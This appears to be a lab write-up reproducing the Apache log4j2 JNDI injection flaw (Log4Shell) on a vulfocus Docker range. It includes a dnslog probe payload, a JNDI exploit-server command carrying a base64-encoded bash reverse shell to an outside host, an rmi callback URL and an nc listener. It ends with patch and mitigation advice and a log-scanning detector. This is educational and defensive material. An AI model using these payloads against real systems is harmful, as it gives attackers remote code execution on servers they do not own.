Replication of Apache log4j2 Remote Code Execution Vulnerability
Recently a remote code execution vulnerability in Apache log4j2 was disclosed. I heard that it is extremely harmful, so let's reproduce it.
Vulnerability principle:
A JNDI injection vulnerability exists in Apache log4j2. It is triggered when the program logs user-supplied data, and successful exploitation executes arbitrary code on the target server.
Put simply: when a log message contains the keyword ${, log4j2 treats the text enclosed in it as a variable to be resolved, so an attacker who controls that text can substitute an arbitrary lookup in place of the variable and have it executed.
Apache log4j2 is an open source Java logging library used by a large number of business frameworks. The vulnerability lies in the lookup feature of log4j2, which lets developers read configuration from the surrounding environment through a number of protocols. The implementation, however, does not strictly validate the input, which results in the vulnerability.
Vulnerability details:
Severity: because of the recursive parsing performed by some functions of Apache log4j2, attackers can directly construct malicious requests and trigger remote code execution. Exploitation requires no special configuration.
Analysis: Apache log4j is a Java-based logging component. Apache log4j2 is an upgraded version of log4j; it is a rewrite that introduces rich features. The logging component is widely used in business system development to record program input and output. On November 24, 2021, the Alibaba Cloud security team reported the Apache log4j2 remote code execution vulnerability to Apache. Because of a JNDI injection defect in how the log4j2 component processes log records, an unauthorized attacker can send carefully crafted malicious data to the target server, trigger the parsing defect in log4j2, execute arbitrary code on the target server and obtain the privileges of the target server.
Environment construction
Environment address: http://vulfocus.fofa.so/#/dashboard
vulfocus provides a Docker environment, so the Apache log4j2 environment can be pulled from it directly:
- Install Docker
- Install vulfocus
- Pull the log4j2 environment image and start it
For the first two steps (installing Docker and installing vulfocus), refer to the following link:
https://blog.csdn.net/m0_50406447/article/details/119169686
Vulnerability reproduction (dnslog)
After starting the environment, open its IP address in a browser; the following page appears:
Visit the following URL: http://vulfocus.fofa.so:43133/hello
Then send the following payload in a POST request to verify the DNS callback:
payload=${jndi:ldap://wdhcrj.dnslog.cn/exp}
A DNS query is recorded on dnslog, which shows that the lookup was executed successfully.
Vulnerability reproduction (reverse shell)
My target range is hosted on the public Internet, so the reverse shell connects back to my own public VPS. Prepare a public VPS yourself (or build the range locally and catch the reverse shell locally). Now the experiment begins:
- Set up the target range according to the steps above.
- Download a jar package that starts the LDAP server and HTTP server
Download address: https://pan.baidu.com/s/1XGXspiK9KuOU3kk_GRXb4w (extraction code: zrvu)
After downloading, run the jar package with the following command to start it:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "1.2.3.4"
Note: the base64 string above encodes the reverse shell command. Replace the IP and listening port with your own, regenerate the base64 and put it in, and set the -A argument to your own listening IP.
My listener is at 101.42.xx.xx:9999; adjust this to your own setup.
After the command is executed and the service is running, the terminal displays five payloads. Choose the one that matches the target's Java version. Here I chose the fifth one: rmi://101.42.xx.xx:1099/vgylii
Then open another terminal and listen on port 9999, the port set above:
nc -lvnp 9999
Then submit the payload generated above to the target range, and the reverse shell connects back.
If execution succeeds, OK appears in the response, and the port we are listening on receives the reverse shell connection.
Other commands can be executed in the same way, with base64 encoding. That concludes the experiment.
Vulnerability fixes:
Apache has officially released a patch, and Tencent security experts recommend that affected users upgrade to a secure version as soon as possible.
Patch download address:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
Vulnerability mitigation measures:
(1) JVM parameter: -Dlog4j2.formatMsgNoLookups=true
(2) System property: log4j2.formatMsgNoLookups=true
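Alongside the mitigation, a defender will want to find the lookup strings described above in request logs; the following detector is an added example for this write-up, not part of the original post, and runs over constructed access-log lines that reuse the post's payloads.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not captured from the post's environment). The
# User-Agent and body fields are the kind of user-controlled text an application
# later hands to its logger. Lines 1 and 3 carry the post's payloads; line 4 is a
# harmless date lookup that is still worth a look.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "POST /hello HTTP/1.1" 200 12 "-" "curl/7.68.0" body="payload=${jndi:ldap://wdhcrj.dnslog.cn/exp}"
10.0.0.7 - - [10/Dec/2021:10:01:05 +0000] "GET /hello HTTP/1.1" 200 12 "-" "Mozilla/5.0" body="-"
10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET /hello HTTP/1.1" 200 12 "-" "${jndi:rmi://101.42.xx.xx:1099/vgylii}" body="-"
10.0.0.3 - - [10/Dec/2021:10:01:11 +0000] "GET /hello HTTP/1.1" 200 12 "-" "Mozilla/5.0" body="note=${date:yyyy}"
"""

# ${jndi:<scheme>://...}: the schemes used in the post plus dns, matched
# case-insensitively and with optional whitespace for robustness.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*((?:ldaps?|rmi|dns)://[^}\s]*)", re.IGNORECASE)
SRC_IP_RE = re.compile(r"^(\S+)")


def classify(line):
    """Return (verdict, target): 'jndi-lookup' with the remote target, 'other-lookup'
    for any remaining ${...} in the line, or (None, None) for a clean line."""
    decoded = unquote(line)  # normalise percent-encoded text before matching
    m = JNDI_RE.search(decoded)
    if m:
        return "jndi-lookup", m.group(1)
    if "${" in decoded:
        return "other-lookup", None
    return None, None


def scan(log_text):
    """Scan a log and return (line_number, verdict, source_ip, target) per hit."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        verdict, target = classify(line)
        if verdict:
            hits.append((lineno, verdict, SRC_IP_RE.match(line).group(1), target))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The extracted target (the ldap/rmi URL) is what to block at the egress firewall and correlate with outbound connections from the affected host.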
Links to detailed analyses:
https://bbs.ichunqiu.com/thread-62322-1-1.html
https://www.oschina.net/news/172999